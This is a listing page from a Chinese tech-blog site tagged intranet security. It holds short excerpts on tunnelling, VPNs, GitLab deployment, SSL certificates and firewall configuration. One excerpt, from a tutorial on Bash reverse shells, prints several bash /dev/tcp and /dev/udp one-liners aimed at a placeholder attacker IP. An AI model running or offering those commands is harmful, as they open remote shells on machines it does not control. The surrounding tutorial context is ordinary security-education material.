内网安全攻防

k8s集群离线安装kuberay operator

版本,下载地址:https://github.com/ray-project/kuberay-helm/releases/tag/kuberay-operator-1.2.22,解压并修改镜像源由于是在内网环境下搭建
thinkerCoder·2025-02-16 10:19

内网隧道代理技术(七)之Bash反弹shell

Bash反弹shellBash介绍Shell也称为终端或壳,是人与内核之间的翻译官,而Bash则是Linux中默认使用的ShellBash反弹Shell的命令如下:bash-i>&/dev/tcp/攻击机_IP/攻击机端口0>&1bash-i>&/dev/tcp/攻击机_IP/攻击机端口0>&2bash-i>&/dev/udp/攻击机_IP/攻击机端口0>&1bash-i>&/dev/udp/攻击
怰月·2025-02-16 06:51

SoftEther 内网穿透配置及使用*

一、程序简介SoftEtherV*N是个由筑波大学DaiyuuNobori研究生因硕士论文开发的开源、跨平台、多重协议的虚拟专用网方案。他让一些虚拟专用网协议像是SSLV*N、L2TP、IPsec、OpenV*N以及微软SSTP都由同一个单一V*N服务器提供。在2014年一月四日以GNU通用公共授权条款方式发布。SothEtherV*N是专门被设计为穿过防火墙的。它支持NAT穿透,使他能越过政府或
十八点四零·2025-02-16 04:32

Windows系统部署Node.js结合内网穿透实现远程访问本地服务

服务3.1注册cpolar账号3.2下载cpolar客户端3.3创建隧道映射本地端口4.固定公网远程地址前言本文主要介绍如何在Windows系统本地安装Node.js环境并创建应用,并结合cpolar内网穿透工具发布公网实现远程访问本地服务详细流程
码农阿豪@新空间·2025-02-15 23:26

企业如何做好密码管理?

想象一个场景:IT运维小叉为公司新人小A开通了10多个应用系统账户,企业微信、绩效系统、CRM系统、公司内网云盘等等,“健忘症患者“小A为了方便记忆,将各个系统密码全部设置为“123456!”
IDaaS杂谈·2025-02-15 12:04

新手必看——ctf六大题型介绍及六大题型解析&举例解题

CTF竞赛通过模拟现实中的网络安全攻防战,让参赛者以攻防对抗的形式,利用各种信息安全技术进行解决一系列安全问题,最终获得“旗帜(Flag)”来获得积分。
沛哥网络安全·2025-02-15 10:19

Web安全攻防:渗透测试实战指南(徐焱)(Z-Library)

目录作者简介······目录······《Web安全攻防:渗透测试实战指南》由浅入深、全面、系统地介绍了当前流行的高危漏洞的攻击手段和防御方法,并力求语言通俗易懂,举例简单明了,便于读者阅读、领会。
快乐的红中·2025-02-14 21:28

微服务限流策略与性能优化全解析

订单服务部署于一组服务器集群,考虑到高可用性,至少配置3个节点,每个节点服务器配备8核CPU、16GB内存、500GB硬盘以及1Gbps网络带宽(内网所以大)。
power-辰南·2025-02-14 19:09

使用GitHub Actions的Self-hosted runner

github网站选择项目点击Settings按钮,进入设置页面点击actions/runners进入Runners页面点击Newself-hostedrunner按钮进入新增页面选择相应配置,生成相应的命令,在内网机器上运行下载
明长歌·2025-02-13 22:59

基于分布式架构的毕业设计题目50例

基于分布式架构的毕业设计题目1-10题1、基于分布式架构的网络考试系统的设计2、基于分布式架构的融合客户数据中心探讨3、基于分布式架构的内网监控系统的应用与研究4、基于分布式架构的铁路企业社会保障管理信息系统设计
love_java_code·2025-02-13 17:23

LVS 部署 NAT 模式集群实现nginx负载均衡实验

负载均衡器(LVS):内网网卡IP地址为10.0.0.11,外网网卡IP(vip)为192.168.65.13
π大星星️·2025-02-13 11:08

莫名奇妙的nginx请求偶发400

网络链路如下所示:云平台----->客户nginx前置机(或其他防火墙)---->客户内网nginx---->java应用现象:有些数据回调正常,有少量数据回调异常!
不像程序员的程序媛·2025-02-13 10:29

MySQL核心原理4

性能优化1.硬件选择CPU:OLTP高可用小事务查询、OLAP分析系统仓库RAM:越大越好快磁盘存储:SSD、阵列优网络、系统:关DNS、mysql接入区DMG内网core:DNS、mysql文件句柄打开数量即开辟
郑心程意·2025-02-13 05:50

安全研究员职业提升路径

阶段一:基础能力沉淀期(0-3年)目标薪资:15-30万/年(国内)核心技能掌握渗透测试全流程(Web/App/内网)熟练使用BurpSuite、Metasploit、IDAPro等工具理解漏洞原理(如
rockmelodies·2025-02-13 03:38

内外网文件传输方案

文件传输问题:企业内网和外网分开了,如何进行文件快速有效稳定的传输呢?如何进行文件交换、在线审批、在线审计呢?如何保证安全可控的文件传输、性能及扩展性强、审批审计便捷呢?常见痛点有哪些?
哆啦A梦z·2025-02-12 10:37

基于OCR的小猿口算比大小脚本

刚做完OCR,赛季就更新到网络信息安全攻防战了。。视觉已死,抓包当道,你要问我怎么抓包?
真理Eternal·2025-02-11 23:43

如何申请免费 SSL 证书?简单几步开启 HTTPS 访问!

方法一:使用自签名SSL证书(适用于个人测试环境)自签名证书适用于测试或内网环境,无需第三方认证机构,但浏览器会标记为“不受信任”。1.生成私钥和自签名证书使用OpenSSL工具创建:opens
·2025-02-11 12:18

没有域名如何为IP地址申请SSL证书?三步搞定HTTPS加密!

无论是企业内网服务器、物联网设备,还是临时测试环境,通过IP地址直接部署HTTPS加密已成为许多场景的刚需。本文将为你拆解纯IP地址申请SSL证书的完整流程,无需域名也能实现数据安全传输。
·2025-02-11 12:45

聊聊在应用层面实现内网穿透功能是否可行

前言最近接手了供方开发的网关项目,交接文档里面有个内网穿透的功能,一下子就吸引的我的目光。
·2025-02-11 11:41

只有IP地址能申请SSL证书吗

无论是企业内网系统、物联网设备还是临时测试环境,只要存在数据传输需求,IP地址同样可以部署SSL证书,为通信链路加装“安全锁”。一、IP地址为何需要SSL证书?
·2025-02-11 11:03

开源代码管理平台Gitlab如何本地化部署并实现公网环境远程访问私有仓库

cpolar5.创建隧道配置访问地址6.固定GitLab访问地址6.1保留二级子域名6.2配置二级子域名7.测试访问二级子域名前言本文主要介绍如何在LinuxCentOS8中搭建GitLab私有仓库并且结合内网穿透工具实现在公网环境下也可以访问本地部署的私有仓库
秋说·2025-02-11 10:43

[内网安全] 内网渗透 - 学习手册

(实验多或者节假日,可能会放缓)笔者也是一边学习一边记录笔记,如果读者发现了笔者的Bug,欢迎留言讨论,笔者会不定期更新以往的笔记,一步步完善内网渗透的只是框架。
Blue17 :: Hack3rX·2025-02-11 03:49

内部视频放送 |《Python安全攻防:渗透测试实战指南》知识星球

《Python安全攻防:渗透测试实战指南》马上就要出版,配套知识星球现在可以安排起来了!主讲老师:一坨奔跑的蜗牛:电信股份有限公司研究院网络安全研员,MS08067安全实验室、贝塔安全实验室核心成员。
Ms08067安全实验室·2025-02-10 11:40

UDP协议转换TCP协议

从互联网把数据搬运到内网中。有的时候拉取视频流数据的时候使用UDP拉取会存在丢包的情况通过TCP拉拉取视频流数据再通过UDP发送这样可以保证质量也能提高效率。
在下陈平安·2025-02-10 10:07

Centos挂载镜像制作本地yum源,并补装图形界面

内网环境centos7.9安装图形页面内网环境制作本地yum源上传镜像到服务器目录创建目录并挂载镜像#创建目录cd/mnt/mkdiriso#挂载mount-oloop.
运维老司机·2025-02-09 23:50

基于行为分析的企业内网安全防护系统设计

引言随着企业数字化转型的加速,内网已经成为企业信息交换和业务处理的重要平台。然而,内网安全问题也随之凸显:内部人员误操作、恶意攻击、数据泄露等威胁对企业安全造成了巨大的挑战。
计算机毕业设计指导·2025-02-09 12:38

Centos8 + Docker + 公司内网环境(需设置代理) 搭建 & 配置 Gitlab

Centos8+Docker+GitLab一、GitLab架构图:根据图,一目了然的了解底层使用了哪些技术!(新版本使用Puma代替Unicorn)二、Centos8前期装备1、设置IP地址,最好固定IP地址,连接外网,配置dnf或yum代理(建议后面不要更换IP,个别网页访问会失败)#--------------------------------------------------------
方冬_肖·2025-02-08 21:19

【centOS】搭建公司内网git环境-GitLab 社区版(GitLab CE)

1.安装必要的依赖以CentOS7系统为例,安装必要的依赖包:sudoyuminstall-ycurlpolicycoreutilsopenssh-serveropenssh-clientspostfixsudosystemctlstartpostfixsudosystemctlenablepostfix2.添加GitLab仓库curl-sShttps://packages.gitlab.com/
唐古乌梁海·2025-02-08 21:43

聊聊在应用层面实现内网穿透功能是否可行

前言最近接手了供方开发的网关项目,交接文档里面有个内网穿透的功能,一下子就吸引的我的目光。
·2025-02-07 22:18

配置【专有网络VPC对等连接】实现多VPC内网免费互通

文章目录介绍目的需求当前VPC环境计划VPC环境前提条件实现步骤VPC互通示意图创建VPC对等连接配置路由条目路由配置路由网段说明规则优先级精细控制ECS网段实操案例计划实现创建专有网络VPCVPC1VPC2VPC列表创建ECSECS1ECS2ECS列表安全组放行端口测试连通性关闭ClassicLink关闭云企业网关闭云企业网卸载云企业网实例配置VPC互通创建VPC对等连接配置路由测试连通性互SS
秋风お亦冷·2025-02-07 18:41

nrm:npm包管理工具

可解决问题:1、更换国内镜像包源(如淘宝npm镜像)解决国内npm国外包慢的问题;2、更换某些内网独立包源,实现安装内网独立的npm包;nrm官网github地址二、安装过程:1、全局安装nrm包npminstall-gnrm2
TP晖·2025-02-07 14:16

追洞计划 | Gitlab CI Lint API未授权 SSRF漏洞(CVE-2021-22214)

文章来源|MS08067Web安全知识星球本文作者:Taoing(Web安全攻防合伙人)GitLab是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的Web服务。
Ms08067安全实验室·2025-02-07 14:44

网络安全配置

iptables-AINPUT-ptcp-mtcp--dport80-jACCEPT#允许远程登陆的端口iptables-AINPUT-s1.1.1.1-ptcp-mtcp--dport22-jACCEPT#允许内网网卡全通
网络安全Ash·2025-02-07 12:01

交换机安全加固配置(H3C)

登录密码错误延迟60秒重试attack-defenseloginreauthentication-delay60#配置管理打开你需要的远程管理方式这里推荐打开SSH和HTTPS并调用ACL限定能够访问的内网
normanhere·2025-02-06 10:38

【人工智能时代】- Windows本地部署Ollama+qwen本地大语言模型Web交互界面并实现公网访问

文章目录前言1.运行Ollama2.安装OpenWebUI2.1在Windows系统安装Docker2.2使用Docker部署OpenWebUI3.安装内网穿透工具4.创建固定公网地址前言本文主要介绍如何在
xiaoli8748_软件开发·2025-02-05 18:11

centos系统中安装跳板机

跳板机一般用作一个中介服务器,通过它可以访问内部系统,同时限制了对内网资源的直接访问。以下是一个常见的跳板机搭建过程,假设你已经有一台CentOS系统并且具备管理员权限。
h韩·2025-02-04 15:18

跨越网络边界:IPv6与零信任架构的深度融合

2024年,工信部发布了《关于开展“网络去NAT”专项工作进一步深化IPv6部署应用的通知》,加速了国内网络由IPv4向IPv6的转型步伐。未来,各行各业将逐步去NAT,逐步向IPv6迁移。
零信任Enlink_Young·2025-02-04 09:30

yum下载离线安装包

目录前言方法一、使用yumdownloader命令方法二、使用--downloaddir参数离线包使用总结前言有时候,我们要去客户现场部署,因为客户都是生产内网,往往是无网环境,无法像公有云服务器一样在线安装软件
GaoJamie·2025-02-04 01:59

免费内网穿透工具推荐

然后在官网点击系统管理->账户管理->我的账户中复制token,然后复制到xiaomiqiu.conf中的auth_token保存后运行启动工具就可以了二.Sunny-ngrok官网:Sunny-Ngrok内网转发内网
kali从入门到入狱·2025-02-03 13:17

docker-compose部署MongoDB&MySQL&RabbitMQ集群

这些节点是在同一个内网环境下的,节点间互通,各节点部署的服务器关系如下表,其中,MySQL的主节点是172.29.154.9,与其他的服务反过来了,目的是减轻单节点的压力。
靖子甘·2025-02-02 23:24

GitLab 部署和配置指南

通过FRP映射内网服务到外部服务器。阿里云服务器的Nginx配置和反向代理。本文将完整涵盖这些配置,帮助您成功部署和维护GitLab服务。
獨梟·2025-02-02 11:03

更改docker默认数据目录,修改docker默认存储目录/var/lib/docker,docker常用文件系统类型,docker默认数据目录迁移,docker离线下载地址,rsync离线下载及安装

其实不使用rsync,使用cp-rp也可以实现环境特别是对内网用户linux系统在内网中,本身没有安装rsync,又不能直接使用yum安装,这里提供相关下载链接1、rsync下载(m
飞火流星02027·2025-02-01 12:08

手把手教你公网远程访问内网Nginx的完整步骤

文章目录前言1.安装Docker2.使用Docker拉取Nginx镜像3.创建并启动Nginx容器4.本地连接测试5.公网远程访问本地Nginx5.1内网穿透工具安装5.2创建远程连接公网地址5.3使用固定公网地址远程访问前言作为开发人员
web18285482512·2025-01-31 20:31

Docker 部署 Nginx 并在容器内配置申请免费 SSL 证书

SSL证书配置Nginx验证域名所有权安装acme.sh生成SSL证书查看已安装证书dockerhttps://hub.docker.com/_/nginxdockerpullnginx:1.27注:国内网络原因无法下载镜像
逢生博客·2025-01-31 06:23

网络安全攻防实战:从基础防护到高级对抗

本教程将通过详细的案例、代码示例和实用工具,帮助读者从基础安全防护到高级安全对抗,系统掌握网络安全攻防的核心技术。
一ge科研小菜鸡·2025-01-31 05:44

用vue写一个内网请求chatgpt的网页可以返回图片请求【内含一个key】

最近不是chatgpt很活吗?可是必须要科技上网才可以进入,所以我就参考其他人写的页面改写了一个网页版不需要chatgpt请求的网页,还可以请求图片哦。部署以后就可以直接使用废话不多说了直接上代码海洋生物详情{{x.msg}}{{x.msg}}{{sentext}}{{sentexttp}}const{createApp}=VuecreateApp({data(){return{api:'',ms
steamedbread321·2025-01-30 20:09

前后端分离项目在内网使用https协议

在SpringBoot中启用HTTPS在现代的网络通信中,安全性成为了一个不能忽视的要求。特别是当我们谈论到数据传输时,保护用户信息的安全性是非常重要的。HTTP协议在数据传输过程中为加密提供了有限的支持,而HTTPS则是HTTP的安全版本,它在HTTP的基础上增加了SSL/TLS协议,用于在客户端和服务器之间的数据传输过程中进行加密,从而提供了更安全的数据传输方式。HTTPS需要使用SSL/TL
梦境之冢·2025-01-30 16:00

grid常用设置

父元素1.dispaly:grid|inline-grid|subgrid;grid:生成块级网格inline-grid:生成行内网格subgrid:如果网格容器本身是网格项(嵌套网格容器),此属性用来继承其父网格容器的列
不停留·2025-01-30 07:15

使用ScriptRunner对象做sql文件导入时遇到的问题

服务端是挂在公网上用来提供数据同步功能,考虑到有可能客户端由于某种情况是不允许连接外网的,所以服务端提供一个接口用来下载全量sql脚本(当然这些数据是某官网公布出来的数据,不考虑数据安全问题),然后客户端通过拷贝或内网传输在客户端进行手动上传
DamonREN·2025-01-30 06:09

ngrok同时配置多个内网穿透方法

一、概要ngrok可以用来配置免费的内网穿透,启动后就可以用外网ip:端口访问到自己计算机的某个端口了。
追逐梦想永不停·2025-01-29 19:15
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他